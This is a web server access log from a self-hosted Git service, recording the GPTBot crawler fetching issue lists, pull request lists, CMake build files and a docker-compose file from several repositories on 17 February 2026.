"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16073] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2ftempCodeRunnerFile.py" [Client 74.7.227.38] [Length 27492] [Gzip 5.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:18:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10085] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11624] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11621] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13144] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12995] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13511] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13509] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13512] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13567] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13511] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13852] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:18:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.50] [Sent-to 192.168.0.250] 